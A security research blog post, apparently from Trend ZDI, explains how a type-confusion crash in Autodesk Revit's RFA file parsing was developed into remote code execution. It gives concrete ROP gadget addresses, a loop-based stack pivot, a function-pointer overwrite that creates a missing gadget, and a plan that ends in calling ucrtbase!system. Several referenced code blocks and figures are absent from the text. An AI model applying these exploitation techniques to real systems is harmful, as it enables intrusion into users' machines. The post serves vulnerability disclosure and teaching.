Crafting a Full Exploit RCE from a Crash in Autodesk Revit RFA File Parsing

October 08, 2025 | Simon Zuckerbraun

In April of 2025, my colleague Mat Powell was hunting for vulnerabilities in Autodesk Revit 2025. While fuzzing RFA files, he found the following crash (CVE-2025-5037 / ZDI-CAN-26922, addressed by Autodesk in July 2025):

Is this an exploitable crash? From the debugger output at the crash point, as seen above, it is unclear whether anything is controllable.

At around this time, my colleague Nitesh Surana uncovered a highly impactful cloud-based supply chain vulnerability in Axis Communications Plugin for Autodesk Revit. This vulnerability made it possible for a malicious actor to force the distribution of corrupted RFA files to Axis plugin users globally, which Autodesk Revit would parse upon use of the Axis Communications plugin. Refer to the blog post here for a full discussion of his research.

Since Trend ZDI was aware of this supply-chain vulnerability, we had a strong interest in determining whether a corrupted RFA file could lead to remote code execution on clients’ machines. I set out to determine the exploitability of the crash shown above. Ultimately, I was able to demonstrate that it could be used reliably for full remote code execution. Thus, in addition to showing the vulnerability of Autodesk Revit, we proved beyond doubt the severity of the Axis plugin supply chain vulnerability.

This article will be devoted to explaining how I reached arbitrary code execution from the crash point shown above. Of particular interest is the technique I used to achieve ROP execution. See the section “Level Up”. Finally, there will be a video showing the ultimate combined effect of a supply-chain attack exploiting the Axis vulnerability and the RCE in Autodesk Revit.

General Assessment of the Root Cause

In investigating the crash, the primary tools I relied upon were IDA Pro and WinDBG with Time Travel Debugging (TTD). Also, due to the modular nature of the Revit application, by which functionality is distributed among many dozens of DLLs, I was able to rely on the presence of export symbols to aid in my understanding. In the paragraphs below I will summarize my findings.

Despite Revit being an extremely heavy application, I was gratified to find that TTD easily captured a full trace of the process when loading the sample RFA. When using TTD in this way, I recommend disabling page heap. Page heap adds a great deal of memory bloat, with little offsetting benefit: when TTD is in use, time travel can be used to determine heap allocation and heap free stacks when necessary.

Tracing tainted data backwards from the crash point, it soon became evident from symbols that a deserializer was involved. The tainted value seen at the crash point was written by a constructor:

This code constructs an object of size 0x10 and initializes it with the first 8 bytes set to 0xffffffffffffffff and the second 8 bytes set to 0. Stepping out backwards in time travel reveals that the constructor sub_1810FDC70 was called from a method named Utility!ARuntimeClass::createObject.

Further tracing revealed that the method Utility!ArchiveClassMaps::loadClass is responsible for reading the type from the input file. In the input file, the type is identified by a 16-bit integer. I noticed that loadClass passes this index value as a2 to the following function:

This proved to be a sort of “Rosetta Stone” for all the numbered types known to the deserializer. It returns a pointer to a PersistentClass structure describing the serializable type indicated by the index a2. The PersistentClass structures for the first 0xb types are found sequentially at the static address unk_180F80FC0, while pointers to the rest are found in the array a1. The size of that array can be seen by examining the bounds check performed in Utility!ArchiveClassMaps::loadClass.

A bit more reversing revealed that offset 0x8 of PersistentClass held a pointer to the corresponding ARuntimeClass, and that offset 0x0 of ARuntimeClass held a pointer to the type name. Armed with this information, I wrote a WinDBG one-liner (okay, two-liner) to dump the names of all types available to the deserializer:
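The pointer walk described above can be modeled offline. The following is a minimal Python sketch, not the WinDBG command itself: it follows offset 0x8 of a PersistentClass to the ARuntimeClass, then offset 0x0 of that to the name. The flat memory snapshot, the helper names, and the assumption that the type name is a narrow, null-terminated string are all illustrative and not taken from Revit.

```python
import struct


def read_qword(mem, base, addr):
    """Read a little-endian 64-bit value from a flat memory snapshot."""
    return struct.unpack_from("<Q", mem, addr - base)[0]


def read_cstring(mem, base, addr):
    """Read a null-terminated narrow string (assumed encoding: ASCII)."""
    start = addr - base
    end = mem.index(b"\x00", start)
    return bytes(mem[start:end]).decode("ascii", errors="replace")


def type_name(mem, base, persistent_class_ptr):
    """PersistentClass+0x8 -> ARuntimeClass, ARuntimeClass+0x0 -> name."""
    runtime_class = read_qword(mem, base, persistent_class_ptr + 0x8)
    name_ptr = read_qword(mem, base, runtime_class + 0x0)
    return read_cstring(mem, base, name_ptr)


# Hypothetical snapshot: one PersistentClass at 0x1000, its ARuntimeClass
# at 0x1020, and the name string at 0x1040.
BASE = 0x1000
snapshot = bytearray(0x60)
struct.pack_into("<Q", snapshot, 0x08, 0x1020)   # PersistentClass+0x8
struct.pack_into("<Q", snapshot, 0x20, 0x1040)   # ARuntimeClass+0x0
snapshot[0x40:0x48] = b"AString\x00"

print(type_name(snapshot, BASE, 0x1000))
```

Repeating the same walk for every index accepted by the lookup function would produce the full list of type names.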

This is intended to be run in WinDBG at the start of sub_1801A4760, so that the array pointer a1 is available in @rcx.

The output is quite lengthy, as there is a total of 4,611 types. Abbreviated output is as follows:

Within the list of available types, one finds mostly high-level C++ classes such as ADocument supporting application logic, but also various simple data types such as integers or std::pair types where the first pair member is a simple numeric type. The class index that led to the crashing object is 0xc4, corresponding to the type:

          std::pair< ElementId, ElementIdSetWrapperClass >

We can now understand the code of the constructor sub_1810FDC70 described above. It is the default constructor for a pair, where the first element of the pair is of the numeric type ElementId and the second element is a pointer (I assume) to an instance of type ElementIdSetWrapperClass. The constructor initializes the pair’s first element to an ElementId of -1, and it initializes the pair’s second element to nullptr.

Furthermore, now we can make an educated guess as to the root cause of the vulnerability. The application deserializes objects from the input file. Its expectation is that those objects will be instances of the high-level classes, each of which has a vtable pointer at offset 0x0, and where the first entry in the vtable is the destructor. However, the deserializer is also capable of deserializing simple types that do not have a vtable. In our case, the object deserialized was a std::pair< ElementId, ElementIdSetWrapperClass >, and the value at offset 0x0 was not a vtable pointer but rather was -1 (=0xffffffffffffffff). When the application attempted to invoke the object’s destructor, it crashed upon dereferencing that value. What we have, then, is a type confusion vulnerability.

Exploiting the type confusion involves choosing an appropriate object to be deserialized, so that we can control program execution when the application attempts to invoke the destructor via the vtable pointer. First, however, we will need to learn how to understand the format of the input file so that we can manipulate its contents. This became a significant subtask in the exploitation challenge.

Exploring the Autodesk RFA Compound Document Format

From a visual inspection of the RFA file in a hex editor, I surmised that the overall format was an OLE Compound File.

An OLE compound file acts as a miniature filesystem that lives within a file. It contains a structure of directories (known as “storages”), and within the storages there can reside data files (known as “streams”).
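The visual check mentioned above comes down to the first eight bytes of the file, which carry the fixed compound file signature D0 CF 11 E0 A1 B1 1A E1. A minimal Python sketch of that check follows; the function names are illustrative only.

```python
# Fixed 8-byte signature at the start of every OLE compound file.
OLE_SIGNATURE = bytes.fromhex("D0CF11E0A1B11AE1")


def looks_like_compound_file(data):
    """Return True if the buffer starts with the compound file signature."""
    return data[:8] == OLE_SIGNATURE


def file_looks_like_compound_file(path):
    """Same check, reading only the first eight bytes of a file on disk."""
    with open(path, "rb") as f:
        return looks_like_compound_file(f.read(8))
```

A matching signature only indicates that the container is a compound file. It says nothing about the storages and streams inside it.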

By painstaking tracing of tainted data using WinDBG, I was able to determine that the serialized data comes from the stream Global\Latest – that is, from a stream named Latest located within a storage named Global, which itself is located at the root of the RFA compound file. However, there was a further complication. Global\Latest does not contain the literal bytes that will be presented to the deserializer. Rather, I found that the contents of Global\Latest are first processed by a gzip-type decompression routine, which I was able to identify by the export symbols. The un-gzipped data is what is fed to the deserializer, and it contains the bytes we are interested in, such as the all-important class index discussed above.

To proceed with experimenting on the file, I needed the following two items:

  1. A method of editing an OLE compound file, so I could modify the contents of the Global\Latest stream.
  2. A way to gunzip the data from the Global\Latest stream, and to gzip it again after modification, using compression compatible with the Revit software.

Presenting CompoundFileTool

To facilitate my research, I wanted a tool that would allow me to easily examine the contents of an OLE compound file and to create new OLE compound files with arbitrary contents. I was not satisfied with the tools I found by searching online and decided to create my own. Together with the publication of this article, we are opening this tool to the community.

Although the OLE compound file format is intended to be a live, editable filesystem, it is not always most convenient to address it in that way. It could also be treated as simply another archive format. The way my tool allows examination of an OLE compound file is by expanding it out into the normal filesystem. It can expand an OLE compound file into a corresponding structure of folders and files on disk. It can also perform the inverse operation to create a new OLE compound file.

You can find the source code here. I hope you find it useful to incorporate it in your fuzzing toolchain whenever you do research on software that consumes compound files.

Decoding Revit’s Gzip Format

The gzip compression used by Revit caused me some confusion for a while. The stream contains a brief header, followed by gzipped data. After the gzipped data, though, I found that there was some sort of padding section consisting of zeroes, and finally another section of high-entropy data.
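The four-part layout described above (header, gzipped data, zero padding, high-entropy trailer) can be separated with Python's standard zlib module. This is only a sketch under assumptions: the header length is not documented here, so the code searches for the gzip magic bytes instead of using a fixed offset, and it treats every zero byte after the gzip member as padding. It performs no error correction, so its output is not guaranteed to match what Revit hands to the deserializer.

```python
import gzip
import zlib

GZIP_MAGIC = b"\x1f\x8b\x08"  # gzip ID1, ID2, and CM = deflate


def split_stream(stream):
    """Split a stream into (header, payload, padding, trailer).

    Assumes the first occurrence of the gzip magic marks the start of the
    compressed member; a real header could contain these bytes by chance.
    """
    start = stream.find(GZIP_MAGIC)
    if start < 0:
        raise ValueError("no gzip member found")
    # wbits = 16 + MAX_WBITS tells zlib to expect a gzip wrapper.
    d = zlib.decompressobj(16 + zlib.MAX_WBITS)
    payload = d.decompress(stream[start:])
    if not d.eof:
        raise ValueError("gzip member is truncated")
    rest = d.unused_data  # everything after the end of the gzip member
    padding_len = len(rest) - len(rest.lstrip(b"\x00"))
    return stream[:start], payload, rest[:padding_len], rest[padding_len:]


# Synthetic example; the header and trailer bytes are made up.
demo = b"HDR!" + gzip.compress(b"serialized bytes") + b"\x00" * 16 + b"\xaa\xbb"
header, payload, padding, trailer = split_stream(demo)
```

The trailer returned here is opaque to this sketch; its meaning is the subject of the paragraphs that follow.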

At first, I did not understand the significance of this final section, so I attempted to ignore it. I mutated an RFA by replacing the gzipped data section with my own gzipped data, keeping the padding and the final data section constant. Revit rejected this modified file as corrupt.

Moreover, I began noticing worrisome discrepancies. I ran the gzipped data from the Global\Latest stream through a standard gunzip utility and compared it with what was presented to the deserializer, as seen inside the debugger. The two versions were a close match, yet not exact.

After puzzling over this for a while, I discovered that the final section consisted of error correcting codes. Public symbols and diagnostic log text strings found in Utility.dll assisted me in reaching this understanding.

When Revit loads a tampered file, for example, a file that was altered by a fuzzer or by manual insertion of crafted data, there are three possible outcomes. If the damage is minor, the data may be successfully recovered. In that case, the changes made by the fuzzer will be reverted entirely. With somewhat more damage, the error correcting codes will do an imperfect job of restoring the original data. In the case of extensive damage, such as a case in which the gzipped data was replaced by entirely different data, Revit determines from the mismatched error correcting codes that the file is corrupt beyond recovery.

Consequently, to properly control the bytes that will be presented to the deserializer, it was crucial to have the ability to produce a correct error correcting code trailer for the stream. Similarly, to be able to take an existing fuzzed RFA file and extract from it an accurate copy of what the deserializer sees, I needed to mimic Revit’s behavior when it performs error correction. To perform these tasks, I created one additional tool for my chain. I accomplished this by copying a minimal subset of low-level DLLs and configuration files from a Revit install and writing a wrapper in C++ to call the appropriate methods. This took care of the gzip/gunzip as well as the error correction tasks in a single step.

Exploiting the Type Confusion

With those tools in my arsenal, I finally was able to rewrite RFA files at will.

As explained above, the original crash occurred due to deserialization of a type with index 0xc4, which is std::pair< ElementId, ElementIdSetWrapperClass >. I began to ponder which type from the list of available types would give me the best advantage for arbitrary code execution.

Recall that the type confusion bug results in a pointer value being read from offset 0x0 of the deserialized object. The software assumes that this is a vtable pointer, and it proceeds to call the first function pointer in the vtable, which is supposed to be the destructor for the object.

Thus, for successful exploitation, we want to choose an object that has a controllable value at offset 0x0, which will be used as a vtable pointer.

After experimenting for a while with the deserializer, I had an epiphany – an absolutely perfect candidate exists. That type is AString, with class index 0x1f.

Why AString? AString is perfect for our needs. Its memory layout is this:

The data at offset 0x0 within an AString instance is guaranteed to be a valid pointer, avoiding a crash. Furthermore, to what does it point? To a buffer containing attacker-controlled data, as read by the deserializer from the input file! Analysis of the AString deserialization code revealed that it reads string data from the input file in length-prefixed format, not in null-terminated format. Consequently, the contents of the string buffer are entirely unrestricted; we can even include null bytes with impunity. For the attacker, this is pure gold. We’re now ready to start turning the type confusion into a remote code execution exploit using ROP.

Development of the ROP Chain

Before we begin ROP exploitation, we’ll need some ASLR defeat. Examining the modules loaded into the Revit process, I found that there was one that did not support ASLR: RWUXThemeSU2015.dll (SHA256 aab0a6ae39b7f503aa0a77d4c85b8603be11982ad5207dddfb0e2e154a411bf2). One module is all it takes. The size of the .text segment of this module is 72 KB, which is large enough to provide a diverse assortment of ROP gadgets.

RWUXThemeSU2015.dll imports both LoadLibraryW and GetProcAddress. By calling these two functions, we can obtain a pointer to an arbitrary export from an arbitrary DLL in the process without the need for any additional hardcoding of offsets that could introduce fragility. My plan was to retrieve the address of ucrtbase!system and to call that function to obtain arbitrary code execution.

Before I could begin assembling a ROP chain, though, there was one major technical hurdle. In the most straightforward ROP scenario, the attacker starts with a stack smash, giving the attacker the opportunity to write at least the beginnings of a ROP chain to the stack. In that situation, the first gadget pointer of the ROP chain overwrites a return address on the stack, and successive gadget pointers occupy successively higher stack locations. Once the target process performs a ret, instead of fetching a legitimate return address, it fetches the address of the first ROP gadget and transfers control there. ROP execution commences at that point.

Our situation is different. We have no stack smash, so there is no opportunity to write any part of a ROP chain to the stack. Instead, we must do it the other way around; we must modify rsp to point to our controlled memory. This is known as a “stack pivot”.

We have a chicken-and-egg problem, though. To launch a ROP chain, we must modify rsp. But, to modify rsp, we need at least some minimal ability to execute code, which means we need to already be running ROP.

Let’s use IDA to look at the crash site, highlighted in yellow:

Figure 1

Note that rbx is a pointer into an array of objects being destructed, one of which is our AString. The code fetches [rbx] into rcx. At that point, rcx is a pointer to our AString. Next it fetches [rcx] into rax, so rax points to our controlled AString bytes. Finally, it performs call qword ptr [rax], allowing us to perform a call to any address we would like. Essentially, what we have here is the power to execute exactly one ROP gadget, but no more, because the stack is not yet pivoted. You have been granted one wish. Choose wisely.

Recalling that rax points to our controlled AString bytes, what we most want is to move rax into rsp. An ideal gadget would look something like this:

Does any such gadget exist? Regrettably, not. This isn’t surprising, though. Restoring rsp from rax isn’t an idiom that one would expect a compiler to emit. Furthermore, the instruction mov rsp, rax requires 3 opcode bytes (48 8B E0), so the probability of finding this byte sequence purely by chance within the .text segment (e.g., as misaligned bytes of other instructions) is quite low.

Sequences such as push rax; pop rsp or lea rsp, [rax+…] would also be usable, if they could be found.

As a fascinating digression, things are somewhat easier if the address in rax is effectively a 32-bit address, meaning that the upper 32 bits of rax are all zeros. I found this to be the case on Windows 10, where the heap buffer containing AString data tends to be in the 32-bit range 0x00000000-0xffffffff. In that case, for a stack pivot instruction, instead of mov rsp, rax, we could get away with mov esp, eax, because in 64-bit mode a write to esp zero-extends into rsp. While still not idiomatic, this does have the major advantage that it requires only 2 opcode bytes instead of 3. Perhaps we could find these two bytes by chance (8B E0).
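Looking for those opcode bytes is a plain substring search over the module's raw bytes. The sketch below is one way to do it in Python; the sample buffer is made up, and a search over a real DLL yields file offsets that still need to be mapped to virtual addresses through the section table and checked for being inside an executable section.

```python
MOV_ESP_EAX = bytes.fromhex("8BE0")      # mov esp, eax
MOV_RSP_RAX = bytes.fromhex("488BE0")    # mov rsp, rax


def find_all(data, pattern):
    """Return every offset at which pattern occurs, including overlaps."""
    hits = []
    pos = data.find(pattern)
    while pos != -1:
        hits.append(pos)
        pos = data.find(pattern, pos + 1)
    return hits


# Made-up bytes: one 64-bit form (which also contains the 32-bit form at
# offset 1) followed by a standalone 32-bit form.
sample = bytes.fromhex("48 8B E0 C3 90 8B E0")
hits32 = find_all(sample, MOV_ESP_EAX)
hits64 = find_all(sample, MOV_RSP_RAX)
```

Each hit is only a candidate. Whether the instructions that follow it lead to a usable control transfer has to be judged in a disassembler.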

Monster Gadget Hunting

I was unable to find a usable mov esp, eax gadget just by running an off-the-shelf gadget-finding tool (ROPgadget). ROPgadget and similar tools work by scanning the target module and cataloging short runs of instructions ending with a control transfer instruction – usually a ret, but sometimes a jmp or even certain calls. Under favorable circumstances, such an automated tool will turn up a wide enough variety of gadgets to allow you to assemble a ROP chain. Here, though, my needs were a bit different. Rather than a sufficiently varied assortment of gadgets, what I needed was one very specific kind of gadget, and I needed it desperately. It was time to play dirtier.

I loaded RWUXThemeSU2015.dll into a hex editor and looked for any occurrence of 8B E0 (mov esp, eax). This offered the possibility of getting some occurrences that ROPgadget missed because they are not found within short sequences ending with a control transfer instruction. I found 12 matches in all and started examining them manually. One of them looked like this. The instruction 8B E0 (mov esp, eax) is obtained by starting execution with the second byte of the highlighted instruction, which is at address 0000000180003a36:

Figure 2

There is quite a long distance from the first instruction into the final ret, which certainly helps explain why ROPgadget didn’t include this in the ROP gadget catalog it offered me. This gadget, if you can even call it that, is a monster! Could it be useful all the same? I saw several important things right away:

• The function has no looping.
• It also has no exception throws, aborts, or other paths that could lead to process termination.
• There are numerous calls, as seen above. However, they are all calls to imported functions from GDI32.dll. In case of error conditions (which are highly likely, considering how badly we’re abusing the code), GDI32 functions are likely to merely return with an error code, and not cause any critical stop (though, see my note below regarding stack alignment).
• Since there are no stack-based buffers, the compiler has not emitted a stack cookie check at the end of the function.
• As is typical in 64-bit code, there is no epilog that restores rsp from rbp. Any modifications made to rsp are “sticky”. They will persist to the end of the function and beyond.

In other words, it looks like we might be able to call 0000000180003a36 to get our mov esp, eax stack pivot, and let the rest of this somewhat large function run its course. The ret at the end will then launch into our ROP chain, because rsp has already been pivoted to our controlled memory. Magically, this worked! The monster gadget shown above executed, start to finish, without harming the process, netting me just the required stack pivot. This solved my problem, on Windows 10 at least, where, as noted above, the heap address in rax tends to be reliably in the range 0xffffffff and lower.

In one respect I was incredibly lucky here. Since the initial value of eax lacked 16-byte alignment (reliably so, it turns out), when transferring this value into rsp and then making numerous GDI calls, those calls could easily have resulted in processor exceptions that would have terminated the process. It was my good fortune that, throughout all those GDI calls, no processor instructions requiring correct 16-byte stack alignment were encountered.

Level Up: A 64-bit Stack Pivot for Windows 11

The exercise above yielded an acceptable stack pivot, but only on Windows 10. On Windows 11, rax will be above 0xffffffff, so a true 64-bit move is required. I tried more monster gadget hunting, but to no avail. In addition to the techniques mentioned above, I used wildcard searches in the hex editor, for example, to look for a push rax followed soon by pop rsp. Nothing was working.

I was at a dead end and it was time to take a different approach. Mulling my options, and necessity being the mother of invention, my mind began to turn to something I’d only dimly appreciated earlier. Refer again to the flow graph of Figure 1. rbx is the pointer into the array of objects being destructed; every time around the loop, rbx points to the next array element. The code reads the array element into rcx, so rcx is a pointer to the object to be destructed. Every time around the loop, it fetches a new vtable pointer into rax and then calls [rax], which is, according to intention, the corresponding destructor function.

We can use this loop as a weird machine.

That’s right – besides ROP, we have a second weird machine at our disposal: the loop at 0x1802851C0 itself! Within the serialized document, we can specify multiple AString objects. Each time around the loop, when it executes the call qword ptr [rax] instruction, it effectively runs a single gadget of our choosing. Theoretically, perhaps, we don’t even need ROP! We can just specify many AString objects, and for each one, we get to execute a single gadget.

Now, this wouldn’t be the most flexible approach, because we would need to ensure that none of our gadgets disturb registers that the loop requires, especially rbx and to a lesser extent rdi. Worse, we would have to tolerate all register modifications made by the loop. However, we don’t need to use this weird machine to obtain arbitrary code execution. All we need is to use it to get a stack pivot. Then, upon the final loop iteration, we can launch conventional ROP.

Once my mind dared to appreciate the potential power of this new weird machine, the solution to my problem became easy. My idea was to use the loop machine to execute multiple gadgets, successively moving the value from the (original) rax to different locations, until I could finally move it to rsp. Now, if you want a value to end up in rsp, what finer register to move it to first than rbp? Can we move directly from rax to rbp? Indeed, we can!

           0000000180009246 : push rax ; pop rbp ; ret

This is the gadget we will execute the first time around the loop. The data of the first AString will begin with a pointer to this gadget. (Side note: The pop rbp; ret; part of this gadget was emitted by the compiler intentionally. The push rax part emerges from a misaligned reading of the instruction that precedes pop rbp.)

Next, we need a gadget that moves rbp into rsp. That also was easy to locate:

          0000000180001109 : leave ; or eax, ecx ; ret

leave is equivalent to mov rsp, rbp ; pop rbp, and, being a one-byte opcode, leave gadgets are relatively easy to find. This completes the transfer of the (original) rax value into rsp. Control never returns to the loop. Instead, the ret instruction of the leave gadget transfers control to the conventional ROP chain. The ROP chain is located within the first AString, immediately after the pointer to the first loop gadget. This is because the rax value transferred to rbp was the rax value associated with the first AString, not the second AString. In summary, I used a somewhat constrained, loop-based weird machine to execute a stack pivot, allowing me to continue execution with a conventional, full-fledged ROP weird machine. And right there is one of the most beautiful things I’ve ever created.
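The two-iteration pivot can be checked with a small register-level model. The Python sketch below is a simulation under stated assumptions, not exploit code: the two gadget addresses are the ones quoted above, while the heap addresses, the object layout beyond offset 0x0, the 8-byte array stride, and the placeholder for the first ROP gadget are all hypothetical.

```python
# Gadget addresses quoted in the article.
PUSH_RAX_POP_RBP_RET = 0x180009246   # push rax ; pop rbp ; ret
LEAVE_OR_RET = 0x180001109           # leave ; or eax, ecx ; ret

# Everything below is hypothetical and chosen only for the simulation.
FIRST_ROP_GADGET = 0x18000DEAD               # placeholder for the real chain
BUF1, BUF2 = 0x20000010000, 0x20000020000    # AString character buffers
OBJ1, OBJ2 = 0x20000030000, 0x20000030010    # AString objects
ARRAY = 0x20000040000                        # array of object pointers


def build_memory():
    """Return a sparse, qword-addressed memory image as a dict."""
    mem = {}

    def write(addr, *qwords):
        for i, q in enumerate(qwords):
            mem[addr + 8 * i] = q

    write(BUF1, PUSH_RAX_POP_RBP_RET, FIRST_ROP_GADGET)  # 1st string data
    write(BUF2, LEAVE_OR_RET)                            # 2nd string data
    write(OBJ1, BUF1)        # offset 0x0 of each AString -> its buffer
    write(OBJ2, BUF2)
    write(ARRAY, OBJ1, OBJ2)
    return mem


def run_loop(mem, count=2):
    """Model the destructor loop; return (regs, first ROP gadget address)."""
    regs = {"rbx": ARRAY, "rbp": 0, "rsp": 0}
    for _ in range(count):
        rcx = mem[regs["rbx"]]       # mov rcx, [rbx]
        rax = mem[rcx]               # mov rax, [rcx]
        target = mem[rax]            # call qword ptr [rax]
        if target == PUSH_RAX_POP_RBP_RET:
            regs["rbp"] = rax        # push rax ; pop rbp ; ret to the loop
        elif target == LEAVE_OR_RET:
            regs["rsp"] = regs["rbp"]            # leave: mov rsp, rbp
            regs["rbp"] = mem[regs["rsp"]]       # leave: pop rbp
            regs["rsp"] += 8
            next_gadget = mem[regs["rsp"]]       # ret
            regs["rsp"] += 8
            return regs, next_gadget
        else:
            raise ValueError("unexpected call target")
        regs["rbx"] += 8             # advance to the next array element
    raise RuntimeError("loop ended without a pivot")


regs, first_gadget = run_loop(build_memory())
```

In this model the pop rbp half of leave consumes the first qword of the first buffer, which is the pointer to the first loop gadget, so the conventional chain starts at the second qword, matching the description above.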

Adventures in Windows x64 ROP

The final major subtask in crafting this exploit was to compose the ROP chain itself.

ROP tends to be considerably more difficult on 64-bit Windows than on 32-bit Windows – even here, where CET is not active – and seems to be somewhat more difficult even than ROP on 64-bit Linux.

Whereas on 32-bit Windows, all function arguments are passed via the stack, on 64-bit Windows the first four arguments are passed via registers, namely rcx, rdx, r8, and r9. Before calling any API, one must utilize gadgets to load the appropriate registers. Moreover, all four of these registers are caller-saved, also known as “volatile” registers, meaning that callees are not responsible for restoring them before returning. Consequently, on Windows, compiled functions rarely end with sequences of instructions that are useful for loading those registers. For example, we will need a gadget to load an argument into rdx, but we won’t find any functions that end with pop rdx; ret, because functions aren’t responsible for restoring rdx before returning.

I have not studied this in depth, but matters seem to be a bit easier on Linux in this regard. Though the situation on Linux seems outwardly similar, in that function arguments are passed via volatile registers (which on Linux are rdi, rsi…), nevertheless, on Linux, the compiler will at times emit sequences usable for loading those registers (for example, pop rsi; ret). This seems to be a peculiarity of the gcc toolchain typically used on Linux.

The difficulty of ROP on 64-bit Windows may account for the relative lack of examples found online. For this reason, I am going to go into some detail on how I constructed my 64-bit Windows ROP chain. For starters: I planned to place some literal strings within the ROP chain to pass as arguments, for example, the command string to pass to ucrtbase!system. To be able to pass a literal string on the ROP stack as an argument, I needed a gadget that would move a stack address (rsp plus an offset) into another register I could work with, and eventually into rcx. Furthermore, as we will see, the ability to obtain a stack address is a generally useful primitive. I found this gadget:

          0x0000000180004c29 : lea rcx, [rsp + 0x20] ; call rax

This is perfect for retrieving a stack address into rcx. The only small trouble is that this gadget does not end with ret. I needed a way to properly resume ROP execution after this gadget. I went with this solution:

This looks like a 3-gadget chain, but it’s a bit more subtle than that. The first gadget pops a certain address into rax, and that address happens to be the address of that very same gadget: pop rax; ret. Now, since the second gadget has already been popped, the next gadget to execute is the third one: lea rcx, [rsp + 0x20] ; call rax. That gadget moves the desired stack address into rcx, then continues by calling rax. To where does this transfer control? To the second pop rax ; ret gadget – because that is what we’ve placed in rax. This pop rax takes the return address that has just been pushed by call rax and pops it back off the stack, moving it into rax but otherwise safely discarding it. Finally, ret continues ROP execution in the normal fashion, starting with the next gadget in stack order following the lea gadget. Keep in mind this technique for cancelling an undesirable return address on the stack, as we will use it again later on.
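To make the stack arithmetic concrete, here is a minimal Python sketch that lays out the three entries and steps through them. The two gadget addresses are the ones given in this article; the base address, the four placeholder qwords that follow, and the helper names are hypothetical. How the rest of a real chain steps over the string data is not modeled.

```python
import struct

POP_RAX_RET = 0x180008E5F          # pop rax ; ret
LEA_RCX_CALL_RAX = 0x180004C29     # lea rcx, [rsp + 0x20] ; call rax


def build(following, data):
    """Lay out the primitive, four following qwords, then the data."""
    if len(following) != 4:
        raise ValueError("exactly four qwords sit between the lea and the data")
    chain = [POP_RAX_RET, POP_RAX_RET, LEA_RCX_CALL_RAX] + list(following)
    return b"".join(struct.pack("<Q", q) for q in chain) + data


def simulate(chain, base):
    """Step through the primitive; return (rcx, next gadget address)."""
    rsp = base

    def pop():
        nonlocal rsp
        value = struct.unpack_from("<Q", chain, rsp - base)[0]
        rsp += 8
        return value

    assert pop() == POP_RAX_RET        # ret into the first gadget
    rax = pop()                        # pop rax (loads the gadget's own address)
    assert pop() == LEA_RCX_CALL_RAX   # ret into the lea gadget
    rcx = rsp + 0x20                   # lea rcx, [rsp + 0x20]
    rsp -= 8                           # call rax pushes a return address
    assert rax == POP_RAX_RET          # control lands on pop rax ; ret again
    rsp += 8                           # pop rax discards that return address
    return rcx, pop()                  # ret continues with the next gadget


BASE = 0x20000010000                   # hypothetical address of the chain
wide = "ucrtbase.dll".encode("utf-16-le") + b"\x00\x00"
chain = build([0x1111, 0x2222, 0x3333, 0x4444], wide)
rcx, next_gadget = simulate(chain, BASE)
```

In this layout rcx ends up pointing 0x20 bytes past the slot that follows the lea gadget, which is where the string has been placed.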

Genetically Modified Gadgets

As mentioned above, a particular difficulty with ROP on 64-bit Windows arises from the need to load function arguments into registers. Arguments are passed via volatile registers such as rdx, but, since these registers are volatile and are not restored at the conclusion of functions, typically there is a lack of gadgets like pop rdx ; ret. This can make loading arguments quite a tough challenge, because the required gadgets may not exist.

In the section above regarding what I call “monster gadgets”, I discussed how I used a hex editor to search more deeply for opcode sequences that could possibly be useful and then used a disassembler to analyze whether those sequences lead to something that could be used as a gadget, however unconventionally. In this instance, though, I took it one step further and crafted a gadget that didn’t exist. Wait, what? Isn’t the whole point of ROP that you don’t yet have the ability to write to executable memory, so you must rely exclusively on existing sequences of opcode bytes?

Well, that is true – almost true. Let me show you what I found, and how in this instance I was able to create a gadget that wasn’t there at the outset.

Consider the following code, found at 0x00000001800040f9:

Figure 3

Here we have some code that loads rdx, a volatile register we need to load. It loads it from rsi, which is a register we can load easily: Since rsi is callee-saved, gadgets of the form pop rsi ; ret are abundant. Of course, the trouble is that the most important element is missing: After it loads rdx, instead of returning to the ROP chain, the code calls some other function, RWOpenThemeData. Where does that lead?

Figure 4

RWOpenThemeData, it turns out, is a wrapper around a call to a function pointer stored at 18001EE38. As part of DllMain initialization, the module populates this function pointer with the address of UXTHEME!OpenThemeData, obtained using a call to GetProcAddress. Unsurprisingly, after initialization, the module leaves the page containing the function pointer in a PAGE_READWRITE state. All told, nothing prevents our ROP chain from overwriting the function pointer at 18001EE38, radically altering the control flow of the code in Figure 3. What should we choose to write into 18001EE38? How about this, our old standby:

          0x0000000180008e5f : pop rax ; ret

After the jmp rax of Figure 4 jumps to 0x0000000180008e5f, the pop rax will safely consume the return address that had been pushed onto the stack by the call in Figure 3, and execution will continue with ret. The net effect is that we’ve turned the code in Figure 3 into this gadget:

          0x00000001800040f9 : mov rdx, rsi ; mov rcx, rdi ; /* stomp rax */; ret

Voilà! Even though, to start with, the module didn’t seem to contain a gadget for loading rdx, I was able to create one through “genetic modification” by altering a function pointer.

I Told You Loading Registers Was Hard

After considering numerous permutations, I found the following overall plan to be workable:

  1. Load the address of the stack-based wide string ucrtbase.dll into rcx and call the LoadLibraryW import of RWUXThemeSU2015.dll.
  2. Move the result of LoadLibraryW from rax into more durable storage. I found rbx to be a good choice.
  3. Using a write-what-where primitive, which is easily crafted, write the narrow string system into a static writable memory location, and then pop (load) its address into rsi.
  4. Invoke the genetically modified gadget at 0x00000001800040f9, described earlier, to move rsi into rdx. This sets up the second parameter for GetProcAddress.
  5. Move the module address from rbx into rcx. How to accomplish this is the only major challenge we haven’t yet discussed.
  6. The proper arguments for GetProcAddress are now in rcx and rdx. Invoke the GetProcAddress import of RWUXThemeSU2015.dll. The result is in rax.
  7. Load the address of the stack-based command line string into rcx and call ucrtbase!system via the function pointer in rax.

As noted in step 5 above, there is still one hole in the plan. We need to find a way to move rbx into rcx, and to do so without disturbing the data in rdx we worked so hard to load. Since rcx is a volatile register, this is challenging to accomplish, though less so than loading rdx was. The solution I found was rather convoluted but at least did not involve any genetic modification:

As you can see, my solution made use of the same stack address retrieval primitive that I discussed earlier, plus a new sequence of four gadgets.

After setting up rcx with a stack address, I invoke the gadget 0x0000000180006a25 to move rbx into rax as a first step. Next, I use the gadget 0x0000000180011dc4, which stores rax into a location just a bit further up on the stack. (Note that this gadget also contains an unwanted xchg. This writes to the ROP stack, but I just barely escape damage because the corrupted gadget address happens to be the one most recently read, which is to say, the address of this very gadget that is currently executing! Since the address has already been read, corrupting it has no effect.) Next, I adjust the stack pointer upward by 8 bytes using a gadget consisting of a single ret, and finally I execute a pop rcx; ret gadget to load rcx from the data that had been stored to the stack. With that, at long last, the parameters are all prepared for the call to GetProcAddress.
